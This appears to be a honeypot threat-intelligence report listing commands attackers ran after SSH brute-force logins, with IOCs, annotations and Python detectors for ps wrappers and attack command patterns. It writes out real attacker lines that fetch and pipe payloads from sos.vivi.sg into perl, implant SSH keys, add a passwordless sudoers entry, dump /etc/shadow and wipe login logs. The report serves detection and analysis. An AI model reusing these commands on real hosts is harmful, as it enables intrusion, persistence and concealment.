Summary

This report collects the actions attackers took after successful SSH brute-force logins against the Elkeid honeypot, together with the related IOCs. Commands are reproduced as the honeypot recorded them (argv with shell quoting stripped), so the quotes around bash -c arguments and echo strings do not appear.

Keywords:

ifjeeisurofmioufiose

Time

20220530

IP

179.43.167.75

Commands executed

bash -c sudo hive-passwd set ifjeeisurofmioufiose; sudo hive-passwd ifjeeisurofmioufiose; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c; cat /hive-config/rig.conf; uname -a (hive-passwd and /hive-config/rig.conf belong to HiveOS, a Linux distribution for GPU mining rigs: the attacker resets the rig password, kills the local X/VNC session and the shellinabox web console, clears the shell history and reads the rig configuration)

Related intelligence

https://www.virustotal.com/gui/ip-address/179.43.167.75

https://threat.gg/attackers/49393300-3dc3-4185-a004-d41e761fe492

Keywords:

finalshell_separator

Time

20221128

IP

107.189.7.193

Commands executed

bash -c export LANG=en_US;export LANGUAGE=en_US;export LC_ALL=en_US;free;echo finalshell_separator;uptime;echo finalshell_separator;cat /proc/net/dev;echo finalshell_separator;df;echo finalshell_separator;sleep 1;free;echo finalshell_separator;uptime;echo finalshell_separator;cat /proc/net/dev;echo finalshell_separator;df;echo finalshell_separator; (this fixed sequence, delimited by finalshell_separator, is the host-status probe the FinalShell SSH client runs after every login; it identifies the attacker's tooling rather than a payload)

Related intelligence

https://www.virustotal.com/gui/url/347ec978ed27fc947fbe5d6f051b45a85f08acfee1d0d3f8d9e7d0b502a64934

Keywords:

wtmp.honeypot,secscan

Time

20221103

IP

182.150.22.222

Commands executed

/bin/bash -c echo secscan:secscan | chpasswd (sets the password of the secscan account to secscan; chpasswd only changes passwords, it does not create the user)

pam_tally2 secscan

/usr/sbin/rsyslogd -n -iNONE

bash -c sd report|grep "Data center"|awk '{print $3}'

chmod 777 i686

./i686 server (makes a dropped binary named i686 executable and runs it with the argument server)

mv /var/log/wtmp /var/log/wtmp.honeypot (renames the login-record file; the chosen name suggests the attacker recognised the host as a honeypot)

Reference links

https://www.virustotal.com/gui/url/4f33bb16afb6b7942dc61cd6250c68cc242cff18310a99d15bb8f5a3041cfc36/detection

Keywords:

alternatives,[Mm]iner

Time

20221203

IP

36.110.228.254

Commands executed

bash -c ps | grep [Mm]iner (looks for an already-running miner)

tar -df alternatives.tar.0 -C /var/lib/dpkg alternatives (most likely the daily dpkg cron job comparing its backup of the alternatives database, i.e. background noise from the honeypot itself rather than attacker activity)

bash -c cat /proc/cpuinfo (collects system information)

ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* (probes for GSM modems and the smsd SMS daemon, a check aimed at routers and cellular gateways)

The process tree recorded for the ps command is shown below, and it is not what a genuine ps produces. The ps invoked by the attacker runs a ps.original, which in turn starts crond, kills and relaunches /etc/32678, runs /root/ps.original, and filters every line containing zzh or pnscan out of the output. In other words, ps on this host had already been replaced by a wrapper that hides and re-launches an implant (most likely left by an earlier intrusion).

|1054.0 bash -c ps | grep [Mm]iner (ppid_argv:/usr/sbin/sshd -D )                          
|-1055.0 ps
|--1057.0 ps.original
|---1064.0 service crond start
|---1062.0 pkill -9 32678
|---1063.0 sh -c /etc/32678&
|---1066.0 /root/ps.original
|--1058.0 grep -v zzh|pnscan
|-1056.0 grep [Mm]iner
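To make the wrapper pattern above checkable on other hosts, here is an added example (it is not part of the original report and not Elkeid code) that parses a process tree in the indented format shown above and flags any ps that spawns children or filters its own output. The line format, the Proc structure and the SAMPLE_TREE text are assumptions taken from the listing above, not an Elkeid specification.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One tree line: leading '|', N dashes for depth, "pid.tid", then argv.
# Format inferred from the listing in this report (an assumption).
TREE_LINE = re.compile(r"^\|(-*)(\d+)\.\d+\s+(.*)$")
# Elkeid annotates the root line with "(ppid_argv:...)"; strip it from argv.
PPID_NOTE = re.compile(r"\s*\(ppid_argv:.*\)\s*$")
PS_NAMES = {"ps", "ps.original"}


@dataclass
class Proc:
    pid: int
    argv: str
    depth: int
    parent: Optional["Proc"] = None
    children: List["Proc"] = field(default_factory=list)


def parse_tree(text: str) -> List[Proc]:
    """Build Proc objects with parent/child links from the indented tree."""
    procs: List[Proc] = []
    stack: List[Proc] = []  # ancestors of the line currently being read
    for raw in text.splitlines():
        m = TREE_LINE.match(raw.strip())
        if not m:
            continue
        depth = len(m.group(1))
        argv = PPID_NOTE.sub("", m.group(3)).strip()
        proc = Proc(int(m.group(2)), argv, depth)
        while stack and stack[-1].depth >= depth:
            stack.pop()
        if stack:
            proc.parent = stack[-1]
            stack[-1].children.append(proc)
        stack.append(proc)
        procs.append(proc)
    return procs


def _basename(argv: str) -> str:
    return argv.split()[0].rsplit("/", 1)[-1] if argv else ""


def find_wrapped_ps(procs: List[Proc]) -> List[dict]:
    """A genuine ps is a leaf process; a ps that spawns children is a wrapper."""
    findings = []
    for p in procs:
        if _basename(p.argv) in PS_NAMES and p.children:
            findings.append({"pid": p.pid, "argv": p.argv,
                             "spawned": [c.argv for c in p.children]})
    return findings


def hidden_patterns(procs: List[Proc]) -> List[str]:
    """Patterns a ps wrapper removes from its own output with 'grep -v'."""
    hidden = []
    for p in procs:
        if _basename(p.argv) in PS_NAMES:
            for c in p.children:
                if c.argv.startswith("grep -v "):
                    hidden.append(c.argv[len("grep -v "):].strip())
    return hidden


# The tree recorded in this report, copied from the listing above.
SAMPLE_TREE = """\
|1054.0 bash -c ps | grep [Mm]iner (ppid_argv:/usr/sbin/sshd -D )
|-1055.0 ps
|--1057.0 ps.original
|---1064.0 service crond start
|---1062.0 pkill -9 32678
|---1063.0 sh -c /etc/32678&
|---1066.0 /root/ps.original
|--1058.0 grep -v zzh|pnscan
|-1056.0 grep [Mm]iner
"""

if __name__ == "__main__":
    tree = parse_tree(SAMPLE_TREE)
    for f in find_wrapped_ps(tree):
        print(f"pid {f['pid']} ({f['argv']}) spawned: {f['spawned']}")
    print("hidden from ps output:", hidden_patterns(tree))
```

On the tree above this reports two wrappers (pid 1055 "ps" and pid 1057 "ps.original") and the hidden pattern zzh|pnscan; on a host where ps is a leaf it reports nothing. The same check can be run against live data by feeding it any process-tree export that uses this indentation style.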

Reference links

https://www.virustotal.com/gui/url/75cbd6ad081bdc9cd0c66c115d44a5fc8c5366626f485a8e09fa6b4d12d68a24

Keywords:

ns3.jpg,oto,sos.vivi.sg

Time

20220801

IP

45.64.130.149

Commands executed

bash -c uname -a;id;cat /etc/shadow /etc/passwd;lscpu; (system and account reconnaissance, including dumping /etc/shadow)

echo daemon ALL=(ALL) NOPASSWD: ALL >> /etc/sudoers;chsh -s /bin/sh daemon; (grants the daemon service account passwordless sudo and a login shell)

echo Password123 |passwd daemon --stdin; (sets the daemon password to Password123; the --stdin flag is specific to RHEL-family passwd)

chattr -ia /root/.ssh/ ; (strips the immutable and append-only attributes so the key file can be replaced)

wget http://sos.vivi.sg/ns1.jpg -O ~/.ssh/authorized_keys; (writes the attacker's key into authorized_keys)

chmod 600 ~/.ssh/authorized_keys;wget -qO - http://sos.vivi.sg/ns2.jpg|perl; (fixes the key file permissions, then pipes a Perl payload fetched from sos.vivi.sg straight into the interpreter)

wget http://sos.vivi.sg/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o; (drops a binary into /tmp, runs it twice under different names and deletes it)

mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh; (keeps a copy of the implanted key under /sbin/.ssh, the daemon account's home directory on RHEL-family systems, so the backdoored daemon user can also log in by key)

chown daemon.daemon /sbin/.ssh /sbin/.ssh/;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys; (ownership and permissions so sshd accepts the file for daemon)

wget http://sos.vivi.sg/oto -O /etc/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://sos.vivi.sg/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto (fetches and runs oto, then removes it; note that wget writes to /etc/oto while the chmod and execution target /tmp/oto, which only the curl fallback supplies)

Reference links

  • 45.64.130.149

https://www.virustotal.com/gui/url/45e78bf413d5dcc2fbb8711f5d47cb41f6fe2e7826f5a147690000abf8632801

  • http://sos.vivi.sg

https://www.virustotal.com/gui/url/98b904c279e990009d48b50527eb1f726f7f6b30a3632d43b7c37b4a0326d768

Keywords:

q(&%^#$SHH?M?A-k3f49!^ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu

Time

20220808

IP

137.184.228.225

Commands executed

bash -c echo -e q(&%^#$SHH?M?A-k3f49!^ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu|passwd|bash (non-interactive password change: three lines are piped into passwd as current password, new password and confirmation; the trailing |bash is inert)

Reference links

  • 137.184.228.225

https://www.virustotal.com/gui/url/921ef4be53465a028e26cf7edc4e3bdc84fef4f28fe78215a4de0c979e274f06

Keywords: games, x

Time

20230212

IP

173.244.55.81

Commands executed

  • mkdir games
  • adduser x (creates a user named x)
  • /sbin/groupadd -g 1001 x
  • touch /var/run/utm
  • cat /proc/cpuinfo (collects hardware information)
  • rm -rf /var/run/utmp (deletes the active-login records)
  • touch /root/.bash_history
  • touch /var/log/wtmp
  • rm -rf /var/log/wtmp (deletes the login history)
  • rm -rf /root/.bash_history (deletes the shell history)
  • sh -c cd /etc/skel; find . -print (lists the skeleton files that new home directories are created from)

Reference links

Keywords: BC20mxv7lX91

Time

20230103

IP

186.6.226.172

Commands executed

  • Delete .ssh and write a key

bash -c cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= /.ssh && cd (replaces the whole ~/.ssh directory with a single attacker key whose comment is mdrfckr; the chmod -R go= /.ssh targets /.ssh rather than ~/.ssh, so that permissions step does nothing useful)

  • Change password

bash -c echo root:BC20mxv7lX91|chpasswd|bash (sets the root password to BC20mxv7lX91; the trailing |bash is inert)
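The commands in this report fall into a handful of recurring behaviours: password changes, sudoers edits, authorized_keys implants, log wiping, fetch-and-execute of remote payloads, miner checks and host reconnaissance. As an added example (not part of the original report and not Elkeid code), the following Python classifier tags honeypot command lines by those behaviours and is run over the lines recorded above plus the benign FinalShell probe, which must produce no tags. The tag names and regexes are my own assumptions, tuned only to what this page shows; the sample lines are copied from the report (the ssh-rsa key body is shortened).

```python
import re
from collections import Counter
from typing import Dict, List

# Each rule tags one behaviour seen in this report. A pattern is matched
# against a single logged command line (argv joined by spaces, quoting already
# stripped, exactly as the honeypot records above). These rules are an added
# example, not Elkeid's own detection logic.
RULES: Dict[str, "re.Pattern[str]"] = {
    "password-change": re.compile(r"\bchpasswd\b|\|\s*passwd\b|\bhive-passwd\b"),
    "sudoers-tamper":  re.compile(r">>?\s*/etc/sudoers\b"),
    "ssh-key-implant": re.compile(r"authorized_keys|rm -rf\s+\S*\.ssh\b"),
    "anti-forensics":  re.compile(
        r"history -c|rm -rf\s+/var/(log/wtmp|run/utmp)\b"
        r"|rm -rf\s+\S*\.bash_history\b|mv\s+/var/log/wtmp\b"),
    "fetch-and-exec":  re.compile(
        r"\b(wget|curl)\b.*\|\s*(sh|bash|perl|python\S*)\b"   # wget ... | perl
        r"|\b(wget|curl)\b.*;\s*chmod\s+(\+x|7\d\d)\b"),      # wget ...; chmod +x
    "miner-related":   re.compile(r"grep \[Mm\]iner|/hive-config/|\bhive-passwd\b"),
    "host-recon":      re.compile(r"\buname -a\b|/proc/cpuinfo|\blscpu\b|cat /etc/shadow"),
}


def classify(cmdline: str) -> List[str]:
    """Sorted tags of every rule whose pattern matches the command line."""
    return sorted(tag for tag, rx in RULES.items() if rx.search(cmdline))


def scan(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each flagged command line to its tags; untagged lines are omitted."""
    flagged = {}
    for line in cmdlines:
        tags = classify(line)
        if tags:
            flagged[line] = tags
    return flagged


def tag_counts(cmdlines: List[str]) -> Counter:
    """How often each behaviour appears across a batch of command lines."""
    counts: Counter = Counter()
    for line in cmdlines:
        counts.update(classify(line))
    return counts


# Command lines taken from this report (key body shortened), plus the benign
# FinalShell monitor line (index 1) that must not be flagged.
SAMPLE_CMDS = [
    r"bash -c sudo hive-passwd set ifjeeisurofmioufiose; sudo hive-passwd ifjeeisurofmioufiose; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c; cat /hive-config/rig.conf; uname -a",
    r"bash -c export LANG=en_US;export LANGUAGE=en_US;export LC_ALL=en_US;free;echo finalshell_separator;uptime;echo finalshell_separator;cat /proc/net/dev;echo finalshell_separator;df;echo finalshell_separator;",
    r"/bin/bash -c echo secscan:secscan | chpasswd",
    r"mv /var/log/wtmp /var/log/wtmp.honeypot",
    r"bash -c ps | grep [Mm]iner",
    r"bash -c uname -a;id;cat /etc/shadow /etc/passwd;lscpu;",
    r"echo daemon ALL=(ALL) NOPASSWD: ALL >> /etc/sudoers;chsh -s /bin/sh daemon;",
    r"chmod 600 ~/.ssh/authorized_keys;wget -qO - http://sos.vivi.sg/ns2.jpg|perl;",
    r"wget http://sos.vivi.sg/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;",
    r"bash -c echo -e q(&%^#$SHH?M?A-k3f49!^ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu|passwd|bash",
    r"rm -rf /var/run/utmp",
    r"bash -c cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2E...oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= /.ssh && cd",
    r"bash -c echo root:BC20mxv7lX91|chpasswd|bash",
]

if __name__ == "__main__":
    for line, tags in scan(SAMPLE_CMDS).items():
        print(", ".join(tags), "<-", line[:70])
    print(tag_counts(SAMPLE_CMDS))
```

The rules deliberately key on the shape of the command rather than on the specific passwords, hosts or file names, so the same classifier still fires on the next campaign that rotates those values; the FinalShell and dpkg-cron lines in this report show why a classifier also needs known-benign patterns to stay quiet on.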